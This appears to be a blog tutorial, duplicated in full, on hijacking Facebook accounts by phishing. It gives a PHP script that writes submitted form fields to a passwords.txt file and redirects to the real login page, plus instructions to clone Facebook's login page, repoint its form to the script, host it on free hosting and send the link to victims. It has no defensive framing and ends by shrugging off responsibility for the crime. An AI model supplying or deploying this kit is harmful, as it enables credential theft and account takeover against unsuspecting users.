Hacking Facebook account using Phishing
How to hack facebook account in windows using phishing?
This is one of the common method to hack facebook account.
STEP 1:Creating Phishing.php file :1. Even if you don’t have any knowledge of php file simply copy the following script and saveit as phishing.php .:<?phpheader(“Location: https://www.facebook.com/login.php”);$handle = fopen(“passwords.txt”, “a”);foreach($_GET as$variable => $value) {fwrite($handle,$variable);fwrite($handle, “=”);fwrite($handle, $value);fwrite($handle, “rn”);}fwrite($handle, “rn”);fclose($handle);exit;?>
STEP 2: Creating index.html page :
1. Open the Facebook login page then, Right click>View page source and paste it in notepad and save it aindex.html
2. Open thatindex.htmlfile with a Notepad and search (By pressing Ctrl F) for : action in it and replace the highlighted part (as in the following screenshot) with phishing.php .
3. search (By pressing Ctrl F) for : method in it and replace the highlighted part (post) with get .
4. save index.html
STEP 3: Now create a completely blank text filewith name passwords.txt.Now you have all the following three files with you :1. phishing.php2. index.html3. passwords.txt
Step 4: Now you need to make a website.I recommended you byethost because it is completely free hosting with free domain.Go to: byethost.com and fill out the informations needed andclick on register button.
2. Now Goto your email account that you gave and confirm your account with confirmation link.(Note the cpanel username that you got when verified with your activation link)
3. Now Go to http://panel.byethost.com and Log into your account Cpanel.Enter your cpanel username and passwordand login
4. Now when you are logged into your accountthen Go to File Manager under Files and log into it.
5. Now Click on the Public_html.
6 .Click on the Upload button and upload 3 filesnamed phishing.php, index.html and passwords.txt (before uploading files you need to delete all thefiles inside thePublic_htmlfolder)
7. After successfully uploaded 3 files click onindex.htmlfile, then your fake phishing page will open up.You are now ready to phishing.sent your fake login page’s URL to someone via email or chatting , when someone type theirfacebook email and password in your fake login page it will store to your passwords.tex file.
I am not responsible for any crime, do it on your own risk.....:)
This is one of the common method to hack facebook account.
STEP 1:Creating Phishing.php file :1. Even if you don’t have any knowledge of php file simply copy the following script and saveit as phishing.php .:<?phpheader(“Location: https://www.facebook.com/login.php”);$handle = fopen(“passwords.txt”, “a”);foreach($_GET as$variable => $value) {fwrite($handle,$variable);fwrite($handle, “=”);fwrite($handle, $value);fwrite($handle, “rn”);}fwrite($handle, “rn”);fclose($handle);exit;?>
STEP 2: Creating index.html page :
1. Open the Facebook login page then, Right click>View page source and paste it in notepad and save it aindex.html
2. Open thatindex.htmlfile with a Notepad and search (By pressing Ctrl F) for : action in it and replace the highlighted part (as in the following screenshot) with phishing.php .
3. search (By pressing Ctrl F) for : method in it and replace the highlighted part (post) with get .
4. save index.html
STEP 3: Now create a completely blank text filewith name passwords.txt.Now you have all the following three files with you :1. phishing.php2. index.html3. passwords.txt
Step 4: Now you need to make a website.I recommended you byethost because it is completely free hosting with free domain.Go to: byethost.com and fill out the informations needed andclick on register button.
2. Now Goto your email account that you gave and confirm your account with confirmation link.(Note the cpanel username that you got when verified with your activation link)
3. Now Go to http://panel.byethost.com and Log into your account Cpanel.Enter your cpanel username and passwordand login
4. Now when you are logged into your accountthen Go to File Manager under Files and log into it.
5. Now Click on the Public_html.
6 .Click on the Upload button and upload 3 filesnamed phishing.php, index.html and passwords.txt (before uploading files you need to delete all thefiles inside thePublic_htmlfolder)
7. After successfully uploaded 3 files click onindex.htmlfile, then your fake phishing page will open up.You are now ready to phishing.sent your fake login page’s URL to someone via email or chatting , when someone type theirfacebook email and password in your fake login page it will store to your passwords.tex file.
I am not responsible for any crime, do it on your own risk.....:)
Comments
Post a Comment